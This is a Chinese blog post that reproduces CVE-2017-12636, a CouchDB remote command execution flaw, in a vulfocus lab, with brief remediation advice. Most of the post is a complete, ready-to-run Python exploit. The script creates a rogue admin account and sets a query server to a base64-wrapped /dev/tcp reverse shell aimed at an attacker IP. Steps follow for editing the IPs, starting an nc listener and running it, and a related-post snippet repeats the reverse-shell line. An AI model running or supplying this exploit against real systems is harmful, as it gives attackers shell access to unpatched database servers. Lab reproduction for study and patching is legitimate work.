Couchdb数据库-命令执行漏洞复现-CVE-2017-12636

最新推荐文章于 2024-04-12 01:56:08 发布
最新推荐文章于 2024-04-12 01:56:08 发布
阅读量203 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: couchdb 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/apple_52661176/article/details/132597406
版权

1 漏洞说明

         Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。

        CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

        默认端口:5984        

2 影响版本

  • <1.7.0
  • <2.1.1

3 漏洞复现

3.1 vulfocus靶场环境

开启vulfocus靶场环境

3.2 漏洞exp

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://47.98.193.176:33669'
command = rb"""sh -i >& /dev/tcp/47.94.236.117/9988 0>&1"""
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
 #session.proxies = {
 #      'http': 'http://127.0.0.1:8085'
 # }
 
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

将exp中的以下两行更改

target = 'http://xx.xx.xx.xx:5984'   #靶机ip 
command = rb"""sh -i >& /dev/tcp/xx.xx.xx.xx/9988 0>&1"""     #攻击机ip

在攻击机上开启nc监听

nc -lvvp 9988

直接执行该py文件即可。

4 修复方法

  • 升级到最新版本。
  • 防火墙策略限制CouchDB端口暴露在公网
gnolnaituil
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Couchdb 任意命令执行漏洞CVE-2017-12636复现
锋刃科技的博客
05-06 3421
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 影响版本 小于 1.7.0 以及 小于 2.1.1 环境搭建 https://githu...
CouchDBClient:CouchDB客户端-.NET客户端框架,用于使用CouchDB
02-03
CouchDBClient(CouchDB .NET客户端) CouchDBClient是用于从.NET代码使用CouchDB的框架。 它抽象化并简化了CouchDB的用法,因此您可以轻松地从应用程序代码中使用它。 在框架下掩盖了使用纯json和http请求/响应的...
Couchdb 任意命令执行漏洞CVE-2017-12636
weixin_44311721的博客
07-30 1425
Couchdb 任意命令执行漏洞CVE-2017-12636Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636)(1)
最新发布
2401_83817171的博客
04-12 640
漏洞复现Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。靶机环境 139.196.87.102 (vulhub)攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)启动 Couchdb 垂直权限绕过漏洞 环境1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径cd /usr/local/tools/
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 969
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 764
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 314
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
couchdb-query-explorer:“ couchdb-query-explorer”有助于轻松查询CouchDB NoSQL数据库
02-04
长沙发查询查询器“ couchdb-query-explorer”有助于轻松查询。 如何建造? 这是一个Angular 7项目,运行常规命令: npm安装ng serve(在端口4200上运行本地服务器) ./docker-build.sh(创建生产版本并将其捆绑在...
couchdb-github-action:在Github Action上运行CouchDB
02-05
couchdb-github-action:在Github Action上运行CouchDB
couchdb-orm:一个简单的CouchDB ORM
02-04
couchdb-orm:一个简单的CouchDB ORM
Apache couchdb 命令执行CVE-2017-12636复现
YouthBelief的博客
11-04 777
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
couchdb 任意命令执行漏洞cve-2017-12636
whatday的专栏
06-08 2276
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221)
weixin_74985952的博客
09-22 134
采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 2404
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636
2401_84002371的博客
03-29 915
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费。
利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞CVE-2017-12636
07-17 390
漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15...
fabric 如何使用couchdb数据库
05-24
在Hyperledger Fabric中,使用CouchDB作为状态数据库是一种可选的选择。要在你的Fabric网络中使用CouchDB,你需要完成以下步骤: 1. 配置CouchDB 在你的网络中,你需要为每个peer节点安装和配置CouchDB。你可以根据需要使用本地或远程的CouchDB实例。然后,你需要在每个peer节点的core.yaml文件中指定CouchDB作为状态数据库。 2. 配置链码 在你的链码中,你需要使用CouchDB作为状态存储。你可以在链码的init函数中使用CouchDB数据库来初始化状态。你还需要在链码的Invoke函数中使用CouchDB数据库来更新状态。 3. 部署链码 在部署链码时,你需要指定CouchDB作为状态数据库。你可以使用peer chaincode install和peer chaincode instantiate命令来部署链码。 4. 查询状态 如果你使用CouchDB作为状态数据库,你可以使用CouchDB的API来查询状态。你可以使用curl命令或浏览器访问CouchDB的Web界面来查询状态。你也可以在你的链码中使用CouchDB的API来查询状态。 总之,使用CouchDB作为状态数据库需要对CouchDB和Hyperledger Fabric的配置和使用有一定的了解。如果你想要深入了解如何使用CouchDB,请查阅Hyperledger Fabric的官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值